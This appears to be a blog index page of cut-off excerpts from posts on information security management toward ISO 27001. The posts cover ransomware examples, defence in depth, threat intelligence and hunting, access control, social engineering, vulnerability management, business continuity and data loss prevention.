Journey to ISO 27001

 

“Ransomware is more about manipulating vulnerabilities in human psychology than the adversary's technological sophistication” ― James Scott, Sr. In May 2017, over 300,000 organisations worldwide were affected by dangerous "WannaCry" ransomware spreading to through networks exploiting Microsoft Window. WannaCry encrypted organisations’ files and demanded $300 worth of Bitcoins to receive the decryption key.  In March of 2021, insurance giant CNA Financial paid $40 million in bitcoin to a culprit recover their data from Phoenix CryptoLocker ransomware. In June 2021, JBS Foods paid $11 million in bitcoin to a Russian hacker group to prevent further disruption from a ransomware. Ransomware is a malware, when infected, encrypts the data in the computer, and deny the access to the files, making to the system a hostage. The culprit demands a ransom payment in exchange for the key to decrypt files in the system. Ransomware has become the most prominent  malware today. They spread

  Image :  Michael Fisher At the heart of your business is data. Protecting your data from malacious actors require using effective strategies. Defense in Depth (DiD) is security strategy that uses series of defensive mechanisms to protect your information assets. Because of layered nature of defences, when a malacious actor breaks one mechanism, the next mechanism steps up to block the attack.   DiD is not a new defence concept; the castles of medieval times used ditches, ramparts, draw-bridge, towers, battlements, and gates for defence. These series of defencive layers can be single or combination of physical, technological and administrative controls.  Administrative control define organisation policies procedures that restrict certain behaviors to ensure security. Technical controls are implemented using software and hardware to protect system resources.  Physical controls protect systems restricting unauthorized access. In web applications Defence in Depth achieved with Web Applic

Image : Tripwire "If you know the enemy and know yourself you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle." - Sun Tzu Threat Intelligence (TI) is the gathering of evidence-based knowledge, processing, and analyzing them to understand threats, threat actors’ motives, targets, and attack behaviors. Threat intelligence provides vitally important information for defenders to protect their information assets, hence it is a critical component of the organization's overall security posture and risk management process. TI helps understand the nature of threats and identification of vulnerabilities, to deploy appropriate security strategies and controls to reduce risks. Threat intelligence is important for learning about unknown threats, making better security decisions, revealing attacker motives and tactic

Image : heimdalsecurity Threat hunting is a proactive process in cyber security that searches for security risks concealed within an organization’s network, data, and endpoints. It entails diving deeply into the IT environment to identify threat actors and attack vectors. If an external attacker or insider can elude initial network defense systems,  they may remain undetected within the network, performing data collection, stealing passwords, eavesdropping on communications secretly, or using network resources for initiating other attacks. Therefore threat hunting is essential for your defense strategy to stop Advanced Persistent Threats (APTs) from remaining in your network.  Threat hunting involves three steps. 1. Trigger:  A trigger alerts the threat hunter when the threat detection system discovers an unusual behavior indicating malicious activity. This causes the threat hunter to intimate further investigation on the event to verify if it's an incident to act upon 2. Investiga

Image : Workable Resources  T he security policy provides the framework for multi layered information security of your organisation. It encompasses the vision of your senior management, the regulations applicable to business operations, and guidance to achieve your security goals. A security policy document establishes a structure to ensure that effective security strategies and controls are in place, roles and responsibilities are assigned, and communicated across the organization,  addressing information and issues. The security documentation follows a hierarchy, stating from security policies, followed by standards, guidelines and procedures.  The compliance with policies, standards, and procedures is mandatory, guidelines are optional. Security Policies Security policies describe the organization’s security goals. They provide an overview of security needs, establish the security scope and define resources required to ensure security. Security policies are mainly three types:  Orga

Image :Threatblock Access is the ability of a user to perform a specific task, such as view, create or modify a file. A control is a countermeasure or safeguard designed to preserve Confidentiality, Integrity and Availability of information within an organization. Access control is a security technique that limits who or what can view or use resources according to to set rules to minimize the risk to the business. There are three types of access controls: physical, logical and administrative. Physical access control limits access to buildings, server rooms and physical information assets. Logical access control limits access to computer networks, operating systems, files, and data. Administrative controls determine which users have access to what information in an organization. You can use electronic access control systems involving user credentials, card readers to prevent or track unauthorized  access to restricted locations such as data centers.  Logical access controls use identifi

Image : Zootopia  Social engineering has become the biggest cyber threat today. In social engineering, the target is a human, who cannot be patched. Humans  continues to carry zero day vulnerabilities. Humans are most vulnerable end point. An attacker using social engineering techniques to deceive and manipulate a victim  to divulge sensitive information like  credentials. The attacker then uses the information obtained to gain unauthorized access to systems to carry out an attack. Social engineering criminals hide their true identities and motives, presenting themselves as trusted individuals or high ranking officials of the organisation. Their objective is to deceive, trick, influence, and manipulate the victim to give information willingly. They exploit fear, greed,  curiosity, fatigue, ambition, urgency, helpfulness, empathy imotions of people.  Social engineering is a popular tactic among attackers because it is quite easier to exploit people than to find a network or software vul

Image : Cyber Plus Sentinel Vulnerability management is a proactive process that is critical to endpoint security. It is aimed to mitigate vulnerability before it leads to a breach.  Vulnerability management is a cyclic process, which identifies information assets, then correlates them to a continually updated vulnerability database to identify potential threats, misconfigurations, and vulnerabilities. It also validates the potential impact and probability of various risk factors created by vulnerabilities to respond to serious threats early. The Forrester Global Security Survey, states that "49% of organizations have suffered one or more breaches in the past year", where software vulnerabilities are the largest. A single vulnerability can help an attacker intrude and steal data. The ever-growing new security holes every day, with most of them having exploits available, highlight the importance of vulnerability management in organization security strategies. The Center for

Image : wallstreetmojo W hat happens when a  major data breach occurs? or a data center network switch failed? How will you act when a ransomware attacked your ERP server? What will you do if your system administrator suffered a heart attack? They are everyday potential disasters. Have you ever planned to face such disasters? Practically, all risks associated with a business function cannot be totally eliminated. Despite every efforts, the residual risks can always remain, and incidents might still occur. Unavoidable situations or unexpected threats and vulnerabilities may bypass  your security controls to effect confidentiality, integrity or availability of your information assets.   Business Continuity Plan (BCP) objective is to restore business operations while recovering from a significant disruption after an incident. Business continuity policy defines what the top management wants to achieve with business continuity. ISO 22301 requires Business continuity policy to be compatible

Image : Guru99 According to CISSP, organizations face information security threats need consideration of following 8 domains in their security strategy. The ISMS framework is focused in ensuring security in them. Security & Risk Management  Asset Security   Security Engineering  Communication & Network Security  Identity & Access Management   Security Assessment & Testing  Security Operations Software Development Security 1 Security & Risk Management : Establishes the security policies, procedures, guidelines, structures and standards to protect information assets and to review the effectiveness of the security controls. 2 Asset Security : Establishes the procedures, structures & standards, and controls used to secure and monitor assets to enforce confidentiality, integrity and availability. 3 Security Engineering: Establishes the  concepts, structures & standards to design and implement  secure systems, networks and applications to enforce confidentiality,

Image :Somansa A data loss is considered a major disaster against cyber security risk management, where organisations require implementing controls to  detect and prevent data breaches, exfiltration, or destruction of sensitive data. A data loss can occur at your server, network, cloud, end points, mobiles as well as manual forms, hence require physical, technical and administrative controls. Data Loss Prevention (DLP) aims to enable mitigation measures to protect and secure your data complying to data protection regulations.  The DLP refers to prevention of data losses and data leakages which may be caused by  ransomware, insider or other application, database or network attacks. The aim of DLP is to prevent unauthorized dara transfers outside organization. DLP help organisations to protect  Personally Identifiable Information (PII)  Intellectual Property  Achieve data visibility Secure mobile workforce and enforce BYOD security Cloud systems Data leaks can happen due to following cau

Threat Modelling aims to identify threats and vulnerabilities to apply controls to mitigate the risks. Killing the Cyber Security Kill Chain is an approach for Threat Modelling with ISO 27001 controls. Related to cybersecurity, ISO27001, KillChain, threatmodelling, advanced persistent threat, command and control, cyber security, exfiltration, exploitation, information security, intrusion, isms, iso 27001, kill chain, lateral movement, privilege escalation, reconnaissance, risk management, security controls, threat intelligence.  #cybersecurity #ISO27001 #KillChain #threatmodelling #niranjanmeegammana #SLIIT Niranjan Meegammana